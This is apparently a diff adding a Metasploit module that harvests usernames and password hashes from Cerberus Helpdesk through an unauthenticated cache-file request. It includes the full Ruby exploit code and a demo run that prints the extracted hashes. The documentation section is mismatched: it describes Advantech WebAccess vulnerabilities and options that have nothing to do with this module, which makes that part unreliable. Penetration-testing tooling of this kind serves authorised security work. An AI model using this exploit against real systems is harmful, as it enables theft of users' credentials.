working code

Author: h00die

documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md

@@ -0,0 +1,69 @@
+## Description
+
+This module exploits three vulnerabilities in Advantech WebAccess.
+
+The first vulnerability is the ability for an arbitrary user to access the admin user list page,
+revealing the username of every user on the system.
+
+The second vulnerability is the user edit page can be accessed loaded by an arbitrary user, with
+the data of an arbitrary user.
+
+The final vulnerability exploited is that the HTML Form on the user edit page contains the user's
+plain text password in the masked password input box. Typically the system should replace the
+actual password with a masked character such as "*".
+
+
+## Vulnerable Application
+
+Version 8.1 was tested during development:
+
+http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccessUSANode8.1_20151230.exe
+
+8.2 is not vulnerable to this.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gahter/advantech_webaccess_creds```
+3. ```set WEBACCESSUSER [USER]```
+4. ```set WEBACCESSPASS [PASS]```
+5. ```run```
+
+## Options
+
+**WEBACCESSUSER**
+
+The username to use to log into Advantech WebAccess. By default, there is a built-in account
+```admin``` that you could use.
+
+**WEBACCESSPASS**
+
+The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
+does not have a password, which could be something you can use.
+
+
+## Demo
+
+msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
+
+Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   URI      /                no        URL of the Cerberus Helpdesk root
+   VHOST                     no        HTTP server virtual host
+
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 10.90.5.81
+rhosts => 10.90.5.81
+msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+
+[-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
+[+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+[+] example:112302c209fe8d73f502c132a3da2b1c
+[+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7

modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb

@@ -0,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
+      'Description'  => %q{
+        This module extracts usernames and password hashes from the Cerberus Helpdesk
+        through an unauthenticated accss to a workers file.
+        Verified on Version 4.2.3 Stable (Build 925)
+        },
+      'References'   =>
+        [
+          [ 'EDB', '39526' ]
+        ],
+      'Author'       => [
+        'asdizzle_', #discovery
+        'h00die',    #module
+        ],
+      'License'      => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('URI', [false, 'URL of the Cerberus Helpdesk root', '/'])
+      ])
+  end
+
+  def run_host(rhost)
+    begin
+      ['devblocks', 'zend'].each do |site|
+        url = "#{datastore['URI']}storage/tmp/#{site}_cache---ch_workers"
+        vprint_status("Attempting to load data from #{url}")
+        res = send_request_cgi({'uri' => url})
+        if not res
+          print_error("#{peer} Unable to connect to #{url}")
+        else
+          if res.body.include?('pass')
+            # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
+            # this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'
+            result = res.body.split('s:5')
+            result.each do |cred|
+              if cred.include?('email')
+                cred = cred.split(':')
+                username = cred[3].tr('";', '') # remove extra characters
+                username = username[0...-1] # also remove trailing s
+                password_hash = cred[7].tr('";', '') # remove extra characters
+                print_good("#{username}:#{password_hash}")
+                store_valid_credential(
+                  user:         username,
+                  private:      password_hash,
+                  private_type: :nonreplayable_hash
+                )
+              end
+            end
+            break # no need to get the 2nd url
+          else
+            print_error("Invalid response received for #{url}")
+          end
+        end
+      end
+
+    rescue ::Rex::ConnectionError
+      print_error("#{peer} Unable to connect to site")
+      return
+    end
+  end
+end